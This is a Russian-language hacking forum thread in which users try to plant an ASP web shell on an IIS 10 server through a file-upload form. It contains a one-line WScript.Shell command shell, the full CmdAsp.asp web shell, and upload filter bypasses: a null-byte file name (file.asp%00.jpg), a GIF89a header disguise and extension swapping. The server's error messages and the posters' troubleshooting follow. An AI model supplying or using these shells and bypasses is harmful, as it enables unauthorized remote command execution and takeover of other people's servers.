Ошибка при загрузки оболочки asp

[Frintezza]

Привет) пытаюсь загрузить оболочку но сервер выдает ошибку
по началу сервер не давал закидавать .asp файл

file.asp

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

потом я это обошел так:

file.asp%00.jpg

GIF89a;

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

теперь сервер выдает ошибку:

Persits.Jpeg.1 error '8004002b'

Premature end of input file

/ScriptLibrary/incSIP2Class.asp, line 1749

IIS-10

не уверень в коде который я гружу так как не понимаю asp.net
есть какие нибуль варианты обхода и загрузки шела ?

 

[Exited3n]

Вот asp шелл:

<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>

 

[Frintezza]

Вот asp шелл:

<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>

По понятном причинам я получаю ошибку
Persits.Jpeg.1 error '800a0002'
Access is denied.
/ScriptLibrary/incSIP2Class.asp, line 1749
не знаете ли вы методы одхода ? как я понимаю сервер читает код и понимает что это не картинка и не даем мне загрузить оболочку

 

[N1GGA]

Привет) пытаюсь загрузить оболочку но сервер выдает ошибку
по началу сервер не давал закидавать .asp файл

file.asp

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

потом я это обошел так:

file.asp%00.jpg

GIF89a;

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

теперь сервер выдает ошибку:

Persits.Jpeg.1 error '8004002b'

Premature end of input file

/ScriptLibrary/incSIP2Class.asp, line 1749

IIS-10

не уверень в коде который я гружу так как не понимаю asp.net
есть какие нибуль варианты обхода и загрузки шела ?

Ты манипулируешь типом файла, чтобы скрипт принял твой шелл как GIF-изображение, а сам даешь ему название .jpg файла. Попробуй расширение тоже .gif указать. А вообще, очень хороший материал

Ссылка скрыта от гостей

и

Ссылка скрыта от гостей

.

 

[Frintezza]

Ты манипулируешь типом файла, чтобы скрипт принял твой шелл как GIF-изображение, а сам даешь ему название .jpg файла. Попробуй расширение тоже .gif указать. А вообще, очень хороший материал

Ссылка скрыта от гостей

и

Ссылка скрыта от гостей

.

Хай бро, спасибо за ссылки, я с этими материалами был знаком. Пока то что мог нарыть в интернете не помогает . И я побробовал конечно же и gif разширения но это не сработало. Я по прежнему получаю ту же ошибку
Persits.Jpeg.1 error '8004002b'
Premature end of input file
/ScriptLibrary/incSIP2Class.asp, line 1749

Возможно нужно найти другую дырку